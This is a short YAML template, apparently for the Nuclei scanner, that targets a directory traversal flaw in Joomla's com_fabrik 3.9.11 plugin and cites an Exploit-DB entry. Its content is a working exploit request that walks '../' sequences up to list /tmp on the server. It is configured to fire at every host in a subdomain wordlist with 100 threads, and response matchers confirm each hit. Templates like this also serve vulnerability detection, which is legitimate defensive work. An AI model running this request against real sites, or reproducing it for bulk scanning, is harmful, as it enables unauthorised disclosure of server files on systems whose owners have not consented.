id: joomla-com-fabrik-lfi
info:
  name: Joomla! com_fabrik 3.9.11 - Directory Traversal
  author: dhiyaneshDk
  severity: high
  tags: joomla,lfi
  reference: https://www.exploit-db.com/exploits/48263
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100
    raw:
      - |
        GET /index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/ HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"value":'
          - '"disable":false'
          - 'text'
        part: body
        condition: and
      - type: status
        status:
          - 200
